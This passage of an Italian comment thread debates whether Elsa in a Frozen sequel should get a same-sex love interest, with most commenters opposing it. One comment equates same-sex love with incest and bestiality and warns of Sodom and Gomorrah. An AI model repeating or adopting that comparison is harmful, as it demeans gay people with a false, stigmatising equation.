    Assolutamente contro. Sono ancora troppo piccoli, imitano tutto, non hanno ancora una loro identità per capire cosa è giusto per loro stessi e cosa vogliano. Favorevole se fosse stato per gli adolescenti. Non dobbiamo imporre le nostre scelte e i nostri orientamenti, capiranno loro quando sarà il momento, così è solo un far finta di essere aperti e moderni creando solo confusione. Ogni cosa a suo tempo. Basta fare i genitori all’avanguardia ci sono prima a bambini a cui pensare.

  22. Eva Spadotto 7 marzo, 2018 at 07:13 Rispondi

    Io sono contraria al far avere un amore ad Elsa, maschio o femmina che sia. Per la seconda volta (ricordate che prima c’è Merida) una principessa affronta i suoi problemi da sola o con l’amore della famiglia, perché ora la vogliamo accasata?? Eccheppalle!! Non possiamo trasmettere ai nostri figli il messaggio che anche da soli si sta bene? Io mi sono innamorata di questi 2 film proprio perché non deve per forza esserci un principe da sposare!

  23. Alice Nicoletti 7 marzo, 2018 at 11:01 Rispondi

    Tutto sta nella nostra capacità di spiegare la vita e l’amore senza imbarazzo alcuno e regalare ai nostri figli la sensibilità di comprendere, accettare, valorizzare e rendere uniche le mille sfaccettature e peculiarità di ogni essere vivente. Se non siamo in grado di fare questo, al giorno d’oggi, abbiamo un grosso problema.

  24. Ale Vimi Roronoa 7 marzo, 2018 at 15:52 Rispondi

    pure nelle favole volete metterci ste cose! Se un frozen 2 con Elsa innamorata devono fare, è meglio che sia un lui. Altrimenti lasciano perdere e non fanno una boiata assurda. Gli omosessuali sono una cosa della realtà? ok ognuno ha libertà di se stesso, ma almeno le storie come quelle disney, lasciamole stare nella loro magia! Principe e Principessa!

  25. Zoya Minina 7 marzo, 2018 at 21:20 Rispondi

    Certamente insegnano amore a nostri bimbi piccoli :donna con donna e poi anche tra 2 uomini e poi figlio con madre e poi con tanti uomini contemporanamente e poi con animali e poi e poi e poi…sempre amore …perché no?arriviamo così Sodoma E gomorra!!!!stiamo confondendo parola amore!!!!FINIAMO MALE .tra amore uomo e donna ce frutto loro bimbi.o cominciamo come in fabrica stampare bambini?comprando l’utero?e se bimbo “sul ordine”nasce con problemi di salute ?lo comprano lo stesso?o buttano nel bidone di spazzatura?svegliamoci !!!!!!

Lascia un commento